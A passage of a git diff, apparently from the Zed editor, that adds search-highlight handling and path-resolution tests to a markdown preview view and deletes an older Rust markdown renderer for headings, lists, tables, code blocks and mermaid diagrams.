!self.markdown.read(cx).search_highlights().is_empty(); + self.markdown.update(cx, |markdown, cx| { + markdown.clear_search_highlights(cx); + }); + if had_highlights { + cx.emit(SearchEvent::MatchesInvalidated); + } + } + + fn update_matches( + &mut self, + matches: &[Self::Match], + active_match_index: Option, + _token: SearchToken, + _window: &mut Window, + cx: &mut Context, + ) { + let old_highlights = self.markdown.read(cx).search_highlights(); + let changed = old_highlights != matches; + self.markdown.update(cx, |markdown, cx| { + markdown.set_search_highlights(matches.to_vec(), active_match_index, cx); + }); + if changed { + cx.emit(SearchEvent::MatchesInvalidated); + } + } + + fn query_suggestion(&mut self, _window: &mut Window, cx: &mut Context) -> String { + self.markdown.read(cx).selected_text().unwrap_or_default() + } + + fn activate_match( + &mut self, + index: usize, + matches: &[Self::Match], + _token: SearchToken, + _window: &mut Window, + cx: &mut Context, + ) { + if let Some(match_range) = matches.get(index) { + let start = match_range.start; + self.markdown.update(cx, |markdown, cx| { + markdown.set_active_search_highlight(Some(index), cx); + markdown.request_autoscroll_to_source_index(start, cx); + }); + cx.emit(SearchEvent::ActiveMatchChanged); + } + } + + fn select_matches( + &mut self, + _matches: &[Self::Match], + _token: SearchToken, + _window: &mut Window, + _cx: &mut Context, + ) { + } + + fn replace( + &mut self, + _: &Self::Match, + _: &SearchQuery, + _token: SearchToken, + _window: &mut Window, + _: &mut Context, + ) { + } + + fn find_matches( + &mut self, + query: Arc, + _window: &mut Window, + cx: &mut Context, + ) -> Task> { + let source = self.markdown.read(cx).source().to_string(); + cx.background_spawn(async move { query.search_str(&source) }) + } + + fn active_match_index( + &mut self, + direction: Direction, + matches: &[Self::Match], + _token: SearchToken, + _window: &mut Window, + cx: &mut Context, + ) -> Option { + if 
matches.is_empty() { + return None; + } + + let markdown = self.markdown.read(cx); + let current_source_index = markdown + .active_search_highlight() + .and_then(|i| markdown.search_highlights().get(i)) + .map(|m| m.start) + .or(self.active_source_index) + .unwrap_or(0); + + match direction { + Direction::Next => matches + .iter() + .position(|m| m.start >= current_source_index) + .or(Some(0)), + Direction::Prev => matches + .iter() + .rposition(|m| m.start <= current_source_index) + .or(Some(matches.len().saturating_sub(1))), + } + } +} + +#[cfg(test)] +mod tests { + use crate::markdown_preview_view::ImageSource; + use crate::markdown_preview_view::Resource; + use crate::markdown_preview_view::resolve_preview_image; + use anyhow::Result; + use std::fs; + use tempfile::TempDir; + + use super::resolve_preview_path; + + #[test] + fn resolves_relative_preview_paths() -> Result<()> { + let temp_dir = TempDir::new()?; + let base_directory = temp_dir.path(); + let file = base_directory.join("notes.md"); + fs::write(&file, "# Notes")?; + + assert_eq!( + resolve_preview_path("notes.md", Some(base_directory)), + Some(file) + ); + assert_eq!( + resolve_preview_path("nonexistent.md", Some(base_directory)), + None + ); + assert_eq!(resolve_preview_path("notes.md", None), None); + + Ok(()) + } + + #[test] + fn resolves_urlencoded_preview_paths() -> Result<()> { + let temp_dir = TempDir::new()?; + let base_directory = temp_dir.path(); + let file = base_directory.join("release notes.md"); + fs::write(&file, "# Release Notes")?; + + assert_eq!( + resolve_preview_path("release%20notes.md", Some(base_directory)), + Some(file) + ); + + Ok(()) + } + + #[test] + fn resolves_workspace_absolute_preview_images() -> Result<()> { + let temp_dir = TempDir::new()?; + let workspace_directory = temp_dir.path(); + + let base_directory = workspace_directory.join("docs"); + fs::create_dir_all(&base_directory)?; + + let image_file = workspace_directory.join("test_image.png"); + 
fs::write(&image_file, "mock data")?; + + let resolved_success = resolve_preview_image( + "/test_image.png", + Some(&base_directory), + Some(workspace_directory), + ); + + match resolved_success { + Some(ImageSource::Resource(Resource::Path(p))) => { + assert_eq!(p.as_ref(), image_file.as_path()); + } + _ => panic!("Expected successful resolution to be a Resource::Path"), + } + + let resolved_missing = resolve_preview_image( + "/missing_image.png", + Some(&base_directory), + Some(workspace_directory), + ); + + let expected_missing_path = if std::path::Path::new("/missing_image.png").is_absolute() { + std::path::PathBuf::from("/missing_image.png") + } else { + // join is to retain windows path prefix C:/ + #[expect(clippy::join_absolute_paths)] + base_directory.join("/missing_image.png") + }; + + match resolved_missing { + Some(ImageSource::Resource(Resource::Path(p))) => { + assert_eq!(p.as_ref(), expected_missing_path.as_path()); + } + _ => panic!("Expected missing file to fallback to a Resource::Path"), + } + + Ok(()) + } + + #[test] + fn does_not_treat_web_links_as_preview_paths() { + assert_eq!(resolve_preview_path("https://zed.dev", None), None); + assert_eq!(resolve_preview_path("http://example.com", None), None); } } diff --git a/crates/markdown_preview/src/markdown_renderer.rs b/crates/markdown_preview/src/markdown_renderer.rs deleted file mode 100644 index 67131a6b2cb81f82a2c550944c96fb4e1ed5a93a..0000000000000000000000000000000000000000 --- a/crates/markdown_preview/src/markdown_renderer.rs +++ /dev/null @@ -1,1500 +0,0 @@ -use crate::{ - markdown_elements::{ - HeadingLevel, Image, Link, MarkdownParagraph, MarkdownParagraphChunk, ParsedMarkdown, - ParsedMarkdownBlockQuote, ParsedMarkdownCodeBlock, ParsedMarkdownElement, - ParsedMarkdownHeading, ParsedMarkdownListItem, ParsedMarkdownListItemType, - ParsedMarkdownMermaidDiagram, ParsedMarkdownMermaidDiagramContents, ParsedMarkdownTable, - ParsedMarkdownTableAlignment, ParsedMarkdownTableRow, - }, - 
markdown_preview_view::MarkdownPreviewView, -}; -use collections::HashMap; -use fs::normalize_path; -use gpui::{ - AbsoluteLength, Animation, AnimationExt, AnyElement, App, AppContext as _, Context, Div, - Element, ElementId, Entity, HighlightStyle, Hsla, ImageSource, InteractiveText, IntoElement, - Keystroke, Modifiers, ParentElement, Render, RenderImage, Resource, SharedString, Styled, - StyledText, Task, TextStyle, WeakEntity, Window, div, img, pulsating_between, rems, -}; -use settings::Settings; -use std::{ - ops::{Mul, Range}, - sync::{Arc, OnceLock}, - time::Duration, - vec, -}; -use theme::{ActiveTheme, SyntaxTheme, ThemeSettings}; -use ui::{CopyButton, LinkPreview, ToggleState, prelude::*, tooltip_container}; -use workspace::{OpenOptions, OpenVisible, Workspace}; - -pub struct CheckboxClickedEvent { - pub checked: bool, - pub source_range: Range, -} - -impl CheckboxClickedEvent { - pub fn source_range(&self) -> Range { - self.source_range.clone() - } - - pub fn checked(&self) -> bool { - self.checked - } -} - -type CheckboxClickedCallback = Arc>; - -type MermaidDiagramCache = HashMap; - -#[derive(Default)] -pub(crate) struct MermaidState { - cache: MermaidDiagramCache, - order: Vec, -} - -impl MermaidState { - fn get_fallback_image( - idx: usize, - old_order: &[ParsedMarkdownMermaidDiagramContents], - new_order_len: usize, - cache: &MermaidDiagramCache, - ) -> Option> { - // When the diagram count changes e.g. addition or removal, positional matching - // is unreliable since a new diagram at index i likely doesn't correspond to the - // old diagram at index i. We only allow fallbacks when counts match, which covers - // the common case of editing a diagram in-place. - // - // Swapping two diagrams would briefly show the stale fallback, but that's an edge - // case we don't handle. 
- if old_order.len() != new_order_len { - return None; - } - old_order.get(idx).and_then(|old_content| { - cache.get(old_content).and_then(|old_cached| { - old_cached - .render_image - .get() - .and_then(|result| result.as_ref().ok().cloned()) - // Chain fallbacks for rapid edits. - .or_else(|| old_cached.fallback_image.clone()) - }) - }) - } - - pub(crate) fn update( - &mut self, - parsed: &ParsedMarkdown, - cx: &mut Context, - ) { - use crate::markdown_elements::ParsedMarkdownElement; - use std::collections::HashSet; - - let mut new_order = Vec::new(); - for element in parsed.children.iter() { - if let ParsedMarkdownElement::MermaidDiagram(mermaid_diagram) = element { - new_order.push(mermaid_diagram.contents.clone()); - } - } - - for (idx, new_content) in new_order.iter().enumerate() { - if !self.cache.contains_key(new_content) { - let fallback = - Self::get_fallback_image(idx, &self.order, new_order.len(), &self.cache); - self.cache.insert( - new_content.clone(), - CachedMermaidDiagram::new(new_content.clone(), fallback, cx), - ); - } - } - - let new_order_set: HashSet<_> = new_order.iter().cloned().collect(); - self.cache - .retain(|content, _| new_order_set.contains(content)); - self.order = new_order; - } -} - -pub(crate) struct CachedMermaidDiagram { - pub(crate) render_image: Arc>>>, - pub(crate) fallback_image: Option>, - _task: Task<()>, -} - -impl CachedMermaidDiagram { - pub(crate) fn new( - contents: ParsedMarkdownMermaidDiagramContents, - fallback_image: Option>, - cx: &mut Context, - ) -> Self { - let result = Arc::new(OnceLock::>>::new()); - let result_clone = result.clone(); - let svg_renderer = cx.svg_renderer(); - - let _task = cx.spawn(async move |this, cx| { - let value = cx - .background_spawn(async move { - let svg_string = crashes::recoverable_panic(|| { - mermaid_rs_renderer::render(&contents.contents) - })??; - let scale = contents.scale as f32 / 100.0; - svg_renderer - .render_single_frame(svg_string.as_bytes(), scale, true) - 
.map_err(|e| anyhow::anyhow!("{}", e)) - }) - .await; - let _ = result_clone.set(value); - this.update(cx, |_, cx| { - cx.notify(); - }) - .ok(); - }); - - Self { - render_image: result, - fallback_image, - _task, - } - } - - #[cfg(test)] - fn new_for_test( - render_image: Option>, - fallback_image: Option>, - ) -> Self { - let result = Arc::new(OnceLock::new()); - if let Some(img) = render_image { - let _ = result.set(Ok(img)); - } - Self { - render_image: result, - fallback_image, - _task: Task::ready(()), - } - } -} -#[derive(Clone)] -pub struct RenderContext<'a> { - workspace: Option>, - next_id: usize, - buffer_font_family: SharedString, - buffer_text_style: TextStyle, - text_style: TextStyle, - border_color: Hsla, - title_bar_background_color: Hsla, - panel_background_color: Hsla, - text_color: Hsla, - link_color: Hsla, - window_rem_size: Pixels, - text_muted_color: Hsla, - code_block_background_color: Hsla, - code_span_background_color: Hsla, - syntax_theme: Arc, - indent: usize, - checkbox_clicked_callback: Option, - is_last_child: bool, - mermaid_state: &'a MermaidState, -} - -impl<'a> RenderContext<'a> { - pub(crate) fn new( - workspace: Option>, - mermaid_state: &'a MermaidState, - window: &mut Window, - cx: &mut App, - ) -> Self { - let theme = cx.theme().clone(); - - let settings = ThemeSettings::get_global(cx); - let buffer_font_family = settings.buffer_font.family.clone(); - let buffer_font_features = settings.buffer_font.features.clone(); - let mut buffer_text_style = window.text_style(); - buffer_text_style.font_family = buffer_font_family.clone(); - buffer_text_style.font_features = buffer_font_features; - buffer_text_style.font_size = AbsoluteLength::from(settings.buffer_font_size(cx)); - - RenderContext { - workspace, - next_id: 0, - indent: 0, - buffer_font_family, - buffer_text_style, - text_style: window.text_style(), - syntax_theme: theme.syntax().clone(), - border_color: theme.colors().border, - title_bar_background_color: 
theme.colors().title_bar_background, - panel_background_color: theme.colors().panel_background, - text_color: theme.colors().text, - link_color: theme.colors().text_accent, - window_rem_size: window.rem_size(), - text_muted_color: theme.colors().text_muted, - code_block_background_color: theme.colors().surface_background, - code_span_background_color: theme.colors().editor_document_highlight_read_background, - checkbox_clicked_callback: None, - is_last_child: false, - mermaid_state, - } - } - - pub fn with_checkbox_clicked_callback( - mut self, - callback: impl Fn(&CheckboxClickedEvent, &mut Window, &mut App) + 'static, - ) -> Self { - self.checkbox_clicked_callback = Some(Arc::new(Box::new(callback))); - self - } - - fn next_id(&mut self, span: &Range) -> ElementId { - let id = format!("markdown-{}-{}-{}", self.next_id, span.start, span.end); - self.next_id += 1; - ElementId::from(SharedString::from(id)) - } - - /// HACK: used to have rems relative to buffer font size, so that things scale appropriately as - /// buffer font size changes. The callees of this function should be reimplemented to use real - /// relative sizing once that is implemented in GPUI - pub fn scaled_rems(&self, rems: f32) -> Rems { - self.buffer_text_style - .font_size - .to_rems(self.window_rem_size) - .mul(rems) - } - - /// This ensures that children inside of block quotes - /// have padding between them. - /// - /// For example, for this markdown: - /// - /// ```markdown - /// > This is a block quote. - /// > - /// > And this is the next paragraph. - /// ``` - /// - /// We give padding between "This is a block quote." - /// and "And this is the next paragraph." - fn with_common_p(&self, element: Div) -> Div { - if self.indent > 0 && !self.is_last_child { - element.pb(self.scaled_rems(0.75)) - } else { - element - } - } - - /// The is used to indicate that the current element is the last child or not of its parent. 
- /// - /// Then we can avoid adding padding to the bottom of the last child. - fn with_last_child(&mut self, is_last: bool, render: R) -> AnyElement - where - R: FnOnce(&mut Self) -> AnyElement, - { - self.is_last_child = is_last; - let element = render(self); - self.is_last_child = false; - element - } -} - -pub fn render_parsed_markdown( - parsed: &ParsedMarkdown, - workspace: Option>, - window: &mut Window, - cx: &mut App, -) -> Div { - let cache = Default::default(); - let mut cx = RenderContext::new(workspace, &cache, window, cx); - - v_flex().gap_3().children( - parsed - .children - .iter() - .map(|block| render_markdown_block(block, &mut cx)), - ) -} -pub fn render_markdown_block(block: &ParsedMarkdownElement, cx: &mut RenderContext) -> AnyElement { - use ParsedMarkdownElement::*; - match block { - Paragraph(text) => render_markdown_paragraph(text, cx), - Heading(heading) => render_markdown_heading(heading, cx), - ListItem(list_item) => render_markdown_list_item(list_item, cx), - Table(table) => render_markdown_table(table, cx), - BlockQuote(block_quote) => render_markdown_block_quote(block_quote, cx), - CodeBlock(code_block) => render_markdown_code_block(code_block, cx), - MermaidDiagram(mermaid) => render_mermaid_diagram(mermaid, cx), - HorizontalRule(_) => render_markdown_rule(cx), - Image(image) => render_markdown_image(image, cx), - } -} - -fn render_markdown_heading(parsed: &ParsedMarkdownHeading, cx: &mut RenderContext) -> AnyElement { - let size = match parsed.level { - HeadingLevel::H1 => 2., - HeadingLevel::H2 => 1.5, - HeadingLevel::H3 => 1.25, - HeadingLevel::H4 => 1., - HeadingLevel::H5 => 0.875, - HeadingLevel::H6 => 0.85, - }; - - let text_size = cx.scaled_rems(size); - - // was `DefiniteLength::from(text_size.mul(1.25))` - // let line_height = DefiniteLength::from(text_size.mul(1.25)); - let line_height = text_size * 1.25; - - // was `rems(0.15)` - // let padding_top = cx.scaled_rems(0.15); - let padding_top = rems(0.15); - - // was 
`.pb_1()` = `rems(0.25)` - // let padding_bottom = cx.scaled_rems(0.25); - let padding_bottom = rems(0.25); - - let color = match parsed.level { - HeadingLevel::H6 => cx.text_muted_color, - _ => cx.text_color, - }; - div() - .line_height(line_height) - .text_size(text_size) - .text_color(color) - .pt(padding_top) - .pb(padding_bottom) - .children(render_markdown_text(&parsed.contents, cx)) - .whitespace_normal() - .into_any() -} - -fn render_markdown_list_item( - parsed: &ParsedMarkdownListItem, - cx: &mut RenderContext, -) -> AnyElement { - use ParsedMarkdownListItemType::*; - let depth = parsed.depth.saturating_sub(1) as usize; - - let bullet = match &parsed.item_type { - Ordered(order) => list_item_prefix(*order as usize, true, depth).into_any_element(), - Unordered => list_item_prefix(1, false, depth).into_any_element(), - Task(checked, range) => div() - .id(cx.next_id(range)) - .mt(cx.scaled_rems(3.0 / 16.0)) - .child( - MarkdownCheckbox::new( - "checkbox", - if *checked { - ToggleState::Selected - } else { - ToggleState::Unselected - }, - cx.clone(), - ) - .when_some( - cx.checkbox_clicked_callback.clone(), - |this, callback| { - this.on_click({ - let range = range.clone(); - move |selection, window, cx| { - let checked = match selection { - ToggleState::Selected => true, - ToggleState::Unselected => false, - _ => return, - }; - - if window.modifiers().secondary() { - callback( - &CheckboxClickedEvent { - checked, - source_range: range.clone(), - }, - window, - cx, - ); - } - } - }) - }, - ), - ) - .hover(|s| s.cursor_pointer()) - .tooltip(|_, cx| { - InteractiveMarkdownElementTooltip::new(None, "toggle checkbox", cx).into() - }) - .into_any_element(), - }; - let bullet = div().mr(cx.scaled_rems(0.5)).child(bullet); - - let contents: Vec = parsed - .content - .iter() - .map(|c| render_markdown_block(c, cx)) - .collect(); - - let item = h_flex() - .when(!parsed.nested, |this| this.pl(cx.scaled_rems(depth as f32))) - .when(parsed.nested && depth > 0, |this| 
this.ml_neg_1p5()) - .items_start() - .children(vec![ - bullet, - v_flex() - .children(contents) - .when(!parsed.nested, |this| this.gap(cx.scaled_rems(1.0))) - .pr(cx.scaled_rems(1.0)) - .w_full(), - ]); - - cx.with_common_p(item).into_any() -} - -/// # MarkdownCheckbox /// -/// HACK: Copied from `ui/src/components/toggle.rs` to deal with scaling issues in markdown preview -/// changes should be integrated into `Checkbox` in `toggle.rs` while making sure checkboxes elsewhere in the -/// app are not visually affected -#[derive(gpui::IntoElement)] -struct MarkdownCheckbox { - id: ElementId, - toggle_state: ToggleState, - disabled: bool, - placeholder: bool, - on_click: Option>, - filled: bool, - style: ui::ToggleStyle, - tooltip: Option gpui::AnyView>>, - label: Option, - base_rem: Rems, -} - -impl MarkdownCheckbox { - /// Creates a new [`Checkbox`]. - fn new(id: impl Into, checked: ToggleState, render_cx: RenderContext) -> Self { - Self { - id: id.into(), - toggle_state: checked, - disabled: false, - on_click: None, - filled: false, - style: ui::ToggleStyle::default(), - tooltip: None, - label: None, - placeholder: false, - base_rem: render_cx.scaled_rems(1.0), - } - } - - /// Binds a handler to the [`Checkbox`] that will be called when clicked. 
- fn on_click(mut self, handler: impl Fn(&ToggleState, &mut Window, &mut App) + 'static) -> Self { - self.on_click = Some(Box::new(handler)); - self - } - - fn bg_color(&self, cx: &App) -> Hsla { - let style = self.style.clone(); - match (style, self.filled) { - (ui::ToggleStyle::Ghost, false) => cx.theme().colors().ghost_element_background, - (ui::ToggleStyle::Ghost, true) => cx.theme().colors().element_background, - (ui::ToggleStyle::ElevationBased(_), false) => gpui::transparent_black(), - (ui::ToggleStyle::ElevationBased(elevation), true) => elevation.darker_bg(cx), - (ui::ToggleStyle::Custom(_), false) => gpui::transparent_black(), - (ui::ToggleStyle::Custom(color), true) => color.opacity(0.2), - } - } - - fn border_color(&self, cx: &App) -> Hsla { - if self.disabled { - return cx.theme().colors().border_variant; - } - - match self.style.clone() { - ui::ToggleStyle::Ghost => cx.theme().colors().border, - ui::ToggleStyle::ElevationBased(_) => cx.theme().colors().border, - ui::ToggleStyle::Custom(color) => color.opacity(0.3), - } - } -} - -impl gpui::RenderOnce for MarkdownCheckbox { - fn render(self, _: &mut Window, cx: &mut App) -> impl IntoElement { - let group_id = format!("checkbox_group_{:?}", self.id); - let color = if self.disabled { - Color::Disabled - } else { - Color::Selected - }; - let icon_size_small = IconSize::Custom(self.base_rem.mul(14. 
/ 16.)); // was IconSize::Small - let icon = match self.toggle_state { - ToggleState::Selected => { - if self.placeholder { - None - } else { - Some( - ui::Icon::new(IconName::Check) - .size(icon_size_small) - .color(color), - ) - } - } - ToggleState::Indeterminate => Some( - ui::Icon::new(IconName::Dash) - .size(icon_size_small) - .color(color), - ), - ToggleState::Unselected => None, - }; - - let bg_color = self.bg_color(cx); - let border_color = self.border_color(cx); - let hover_border_color = border_color.alpha(0.7); - - let size = self.base_rem.mul(1.25); // was Self::container_size(); (20px) - - let checkbox = h_flex() - .id(self.id.clone()) - .justify_center() - .items_center() - .size(size) - .group(group_id.clone()) - .child( - div() - .flex() - .flex_none() - .justify_center() - .items_center() - .m(self.base_rem.mul(0.25)) // was .m_1 - .size(self.base_rem.mul(1.0)) // was .size_4 - .rounded(self.base_rem.mul(0.125)) // was .rounded_xs - .border_1() - .bg(bg_color) - .border_color(border_color) - .when(self.disabled, |this| this.cursor_not_allowed()) - .when(self.disabled, |this| { - this.bg(cx.theme().colors().element_disabled.opacity(0.6)) - }) - .when(!self.disabled, |this| { - this.group_hover(group_id.clone(), |el| el.border_color(hover_border_color)) - }) - .when(self.placeholder, |this| { - this.child( - div() - .flex_none() - .rounded_full() - .bg(color.color(cx).alpha(0.5)) - .size(self.base_rem.mul(0.25)), // was .size_1 - ) - }) - .children(icon), - ); - - h_flex() - .id(self.id) - .gap(ui::DynamicSpacing::Base06.rems(cx)) - .child(checkbox) - .when_some( - self.on_click.filter(|_| !self.disabled), - |this, on_click| { - this.on_click(move |_, window, cx| { - on_click(&self.toggle_state.inverse(), window, cx) - }) - }, - ) - // TODO: Allow label size to be different from default. - // TODO: Allow label color to be different from muted. 
- .when_some(self.label, |this, label| { - this.child(Label::new(label).color(Color::Muted)) - }) - .when_some(self.tooltip, |this, tooltip| { - this.tooltip(move |window, cx| tooltip(window, cx)) - }) - } -} - -fn calculate_table_columns_count(rows: &Vec) -> usize { - let mut actual_column_count = 0; - for row in rows { - actual_column_count = actual_column_count.max( - row.columns - .iter() - .map(|column| column.col_span) - .sum::(), - ); - } - actual_column_count -} - -fn render_markdown_table(parsed: &ParsedMarkdownTable, cx: &mut RenderContext) -> AnyElement { - let actual_header_column_count = calculate_table_columns_count(&parsed.header); - let actual_body_column_count = calculate_table_columns_count(&parsed.body); - let max_column_count = std::cmp::max(actual_header_column_count, actual_body_column_count); - - let total_rows = parsed.header.len() + parsed.body.len(); - - // Track which grid cells are occupied by spanning cells - let mut grid_occupied = vec![vec![false; max_column_count]; total_rows]; - - let mut cells = Vec::with_capacity(total_rows * max_column_count); - - for (row_idx, row) in parsed.header.iter().chain(parsed.body.iter()).enumerate() { - let mut col_idx = 0; - - for cell in row.columns.iter() { - // Skip columns occupied by row-spanning cells from previous rows - while col_idx < max_column_count && grid_occupied[row_idx][col_idx] { - col_idx += 1; - } - - if col_idx >= max_column_count { - break; - } - - let container = match cell.alignment { - ParsedMarkdownTableAlignment::Left | ParsedMarkdownTableAlignment::None => div(), - ParsedMarkdownTableAlignment::Center => v_flex().items_center(), - ParsedMarkdownTableAlignment::Right => v_flex().items_end(), - }; - - let cell_element = container - .col_span(cell.col_span.min(max_column_count - col_idx) as u16) - .row_span(cell.row_span.min(total_rows - row_idx) as u16) - .children(render_markdown_text(&cell.children, cx)) - .px_2() - .py_1() - .when(col_idx > 0, |this| this.border_l_1()) - 
.when(row_idx > 0, |this| this.border_t_1()) - .border_color(cx.border_color) - .when(cell.is_header, |this| { - this.bg(cx.title_bar_background_color) - }) - .when(cell.row_span > 1, |this| this.justify_center()) - .when(row_idx % 2 == 1, |this| this.bg(cx.panel_background_color)); - - cells.push(cell_element); - - // Mark grid positions as occupied for row-spanning cells - for r in 0..cell.row_span { - for c in 0..cell.col_span { - if row_idx + r < total_rows && col_idx + c < max_column_count { - grid_occupied[row_idx + r][col_idx + c] = true; - } - } - } - - col_idx += cell.col_span; - } - - // Fill remaining columns with empty cells if needed - while col_idx < max_column_count { - if grid_occupied[row_idx][col_idx] { - col_idx += 1; - continue; - } - - let empty_cell = div() - .when(col_idx > 0, |this| this.border_l_1()) - .when(row_idx > 0, |this| this.border_t_1()) - .border_color(cx.border_color) - .when(row_idx % 2 == 1, |this| this.bg(cx.panel_background_color)); - - cells.push(empty_cell); - col_idx += 1; - } - } - - cx.with_common_p(v_flex().items_start()) - .when_some(parsed.caption.as_ref(), |this, caption| { - this.children(render_markdown_text(caption, cx)) - }) - .border_1() - .border_color(cx.border_color) - .rounded_sm() - .overflow_hidden() - .child( - div() - .min_w_0() - .w_full() - .grid() - .grid_cols(max_column_count as u16) - .children(cells), - ) - .into_any() -} - -fn render_markdown_block_quote( - parsed: &ParsedMarkdownBlockQuote, - cx: &mut RenderContext, -) -> AnyElement { - cx.indent += 1; - - let children: Vec = parsed - .children - .iter() - .enumerate() - .map(|(ix, child)| { - cx.with_last_child(ix + 1 == parsed.children.len(), |cx| { - render_markdown_block(child, cx) - }) - }) - .collect(); - - cx.indent -= 1; - - cx.with_common_p(div()) - .child( - div() - .border_l_4() - .border_color(cx.border_color) - .pl_3() - .children(children), - ) - .into_any() -} - -fn render_markdown_code_block( - parsed: &ParsedMarkdownCodeBlock, - 
cx: &mut RenderContext, -) -> AnyElement { - let body = if let Some(highlights) = parsed.highlights.as_ref() { - StyledText::new(parsed.contents.clone()).with_default_highlights( - &cx.buffer_text_style, - highlights.iter().filter_map(|(range, highlight_id)| { - highlight_id - .style(cx.syntax_theme.as_ref()) - .map(|style| (range.clone(), style)) - }), - ) - } else { - StyledText::new(parsed.contents.clone()) - }; - - let copy_block_button = CopyButton::new("copy-codeblock", parsed.contents.clone()) - .tooltip_label("Copy Codeblock") - .visible_on_hover("markdown-block"); - - let font = gpui::Font { - family: cx.buffer_font_family.clone(), - features: cx.buffer_text_style.font_features.clone(), - ..Default::default() - }; - - cx.with_common_p(div()) - .font(font) - .px_3() - .py_3() - .bg(cx.code_block_background_color) - .rounded_sm() - .child(body) - .child( - div() - .h_flex() - .absolute() - .right_1() - .top_1() - .child(copy_block_button), - ) - .into_any() -} - -fn render_mermaid_diagram( - parsed: &ParsedMarkdownMermaidDiagram, - cx: &mut RenderContext, -) -> AnyElement { - let cached = cx.mermaid_state.cache.get(&parsed.contents); - - if let Some(result) = cached.and_then(|c| c.render_image.get()) { - match result { - Ok(render_image) => cx - .with_common_p(div()) - .px_3() - .py_3() - .bg(cx.code_block_background_color) - .rounded_sm() - .child( - div().w_full().child( - img(ImageSource::Render(render_image.clone())) - .max_w_full() - .with_fallback(|| { - div() - .child(Label::new("Failed to load mermaid diagram")) - .into_any_element() - }), - ), - ) - .into_any(), - Err(_) => cx - .with_common_p(div()) - .px_3() - .py_3() - .bg(cx.code_block_background_color) - .rounded_sm() - .child(StyledText::new(parsed.contents.contents.clone())) - .into_any(), - } - } else if let Some(fallback) = cached.and_then(|c| c.fallback_image.as_ref()) { - cx.with_common_p(div()) - .px_3() - .py_3() - .bg(cx.code_block_background_color) - .rounded_sm() - .child( - div() - 
.w_full() - .child( - img(ImageSource::Render(fallback.clone())) - .max_w_full() - .with_fallback(|| { - div() - .child(Label::new("Failed to load mermaid diagram")) - .into_any_element() - }), - ) - .with_animation( - "mermaid-fallback-pulse", - Animation::new(Duration::from_secs(2)) - .repeat() - .with_easing(pulsating_between(0.6, 1.0)), - |el, delta| el.opacity(delta), - ), - ) - .into_any() - } else { - cx.with_common_p(div()) - .px_3() - .py_3() - .bg(cx.code_block_background_color) - .rounded_sm() - .child( - Label::new("Rendering mermaid diagram...") - .color(Color::Muted) - .with_animation( - "mermaid-loading-pulse", - Animation::new(Duration::from_secs(2)) - .repeat() - .with_easing(pulsating_between(0.4, 0.8)), - |label, delta| label.alpha(delta), - ), - ) - .into_any() - } -} - -fn render_markdown_paragraph(parsed: &MarkdownParagraph, cx: &mut RenderContext) -> AnyElement { - cx.with_common_p(div()) - .children(render_markdown_text(parsed, cx)) - .flex() - .flex_col() - .into_any_element() -} - -fn render_markdown_text(parsed_new: &MarkdownParagraph, cx: &mut RenderContext) -> Vec { - let mut any_element = Vec::with_capacity(parsed_new.len()); - // these values are cloned in-order satisfy borrow checker - let syntax_theme = cx.syntax_theme.clone(); - let workspace_clone = cx.workspace.clone(); - let code_span_bg_color = cx.code_span_background_color; - let text_style = cx.text_style.clone(); - let link_color = cx.link_color; - - for parsed_region in parsed_new { - match parsed_region { - MarkdownParagraphChunk::Text(parsed) => { - let element_id = cx.next_id(&parsed.source_range); - - let highlights = gpui::combine_highlights( - parsed.highlights.iter().filter_map(|(range, highlight)| { - highlight - .to_highlight_style(&syntax_theme) - .map(|style| (range.clone(), style)) - }), - parsed.regions.iter().filter_map(|(range, region)| { - if region.code { - Some(( - range.clone(), - HighlightStyle { - background_color: Some(code_span_bg_color), - 
..Default::default() - }, - )) - } else if region.link.is_some() { - Some(( - range.clone(), - HighlightStyle { - color: Some(link_color), - ..Default::default() - }, - )) - } else { - None - } - }), - ); - let mut links = Vec::new(); - let mut link_ranges = Vec::new(); - for (range, region) in parsed.regions.iter() { - if let Some(link) = region.link.clone() { - links.push(link); - link_ranges.push(range.clone()); - } - } - let workspace = workspace_clone.clone(); - let element = div() - .child( - InteractiveText::new( - element_id, - StyledText::new(parsed.contents.clone()) - .with_default_highlights(&text_style, highlights), - ) - .tooltip({ - let links = links.clone(); - let link_ranges = link_ranges.clone(); - move |idx, _, cx| { - for (ix, range) in link_ranges.iter().enumerate() { - if range.contains(&idx) { - return Some(LinkPreview::new(&links[ix].to_string(), cx)); - } - } - None - } - }) - .on_click( - link_ranges, - move |clicked_range_ix, window, cx| match &links[clicked_range_ix] { - Link::Web { url } => cx.open_url(url), - Link::Path { path, .. } => { - if let Some(workspace) = &workspace { - _ = workspace.update(cx, |workspace, cx| { - workspace - .open_abs_path( - normalize_path(path.clone().as_path()), - OpenOptions { - visible: Some(OpenVisible::None), - ..Default::default() - }, - window, - cx, - ) - .detach(); - }); - } - } - }, - ), - ) - .into_any(); - any_element.push(element); - } - - MarkdownParagraphChunk::Image(image) => { - any_element.push(render_markdown_image(image, cx)); - } - } - } - - any_element -} - -fn render_markdown_rule(cx: &mut RenderContext) -> AnyElement { - let rule = div().w_full().h(cx.scaled_rems(0.125)).bg(cx.border_color); - div().py(cx.scaled_rems(0.5)).child(rule).into_any() -} - -fn render_markdown_image(image: &Image, cx: &mut RenderContext) -> AnyElement { - let image_resource = match image.link.clone() { - Link::Web { url } => Resource::Uri(url.into()), - Link::Path { path, .. 
} => Resource::Path(Arc::from(path)), - }; - - let element_id = cx.next_id(&image.source_range); - let workspace = cx.workspace.clone(); - - div() - .id(element_id) - .cursor_pointer() - .child( - img(ImageSource::Resource(image_resource)) - .max_w_full() - .with_fallback({ - let alt_text = image.alt_text.clone(); - move || div().children(alt_text.clone()).into_any_element() - }) - .when_some(image.height, |this, height| this.h(height)) - .when_some(image.width, |this, width| this.w(width)), - ) - .tooltip({ - let link = image.link.clone(); - let alt_text = image.alt_text.clone(); - move |_, cx| { - InteractiveMarkdownElementTooltip::new( - Some(alt_text.clone().unwrap_or(link.to_string().into())), - "open image", - cx, - ) - .into() - } - }) - .on_click({ - let link = image.link.clone(); - move |_, window, cx| { - if window.modifiers().secondary() { - match &link { - Link::Web { url } => cx.open_url(url), - Link::Path { path, .. } => { - if let Some(workspace) = &workspace { - _ = workspace.update(cx, |workspace, cx| { - workspace - .open_abs_path( - path.clone(), - OpenOptions { - visible: Some(OpenVisible::None), - ..Default::default() - }, - window, - cx, - ) - .detach(); - }); - } - } - } - } - } - }) - .into_any() -} - -struct InteractiveMarkdownElementTooltip { - tooltip_text: Option, - action_text: SharedString, -} - -impl InteractiveMarkdownElementTooltip { - pub fn new( - tooltip_text: Option, - action_text: impl Into, - cx: &mut App, - ) -> Entity { - let tooltip_text = tooltip_text.map(|t| 